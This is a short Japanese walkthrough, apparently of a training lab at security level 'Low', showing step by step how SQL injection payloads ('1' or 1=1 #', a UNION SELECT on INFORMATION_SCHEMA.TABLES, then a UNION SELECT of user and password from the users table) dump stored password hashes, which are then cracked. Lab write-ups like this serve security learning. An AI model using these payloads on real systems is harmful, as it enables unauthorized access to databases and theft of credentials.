Hey guys!

セキュリティレベル『Low』で実行。

まずは、ソースコードを確認。

 

 

『1』と入力して動作を確認。

 

 

まずは、『1'』だとエラー。

 

 

『1' or 1=1』でもエラー。

 

 

『1' or 1=1 #』だとなにか情報が出てきた。

#を追加することで、#以降の文字をコメント処理させてみた。

 

 

『1' or 1=1 union SELECT null,table_name FROM INFORMATION_SCHEMA.TABLES#』でテーブルを取得。

 

 

どうやらusersテーブルがあるようなので
『1' or 1=1 union select user,password from users #』でパスワードを表示。

 

 

パスワードのハッシュ値を複合すると『password』で、ビンゴ！

 

 

Best regards,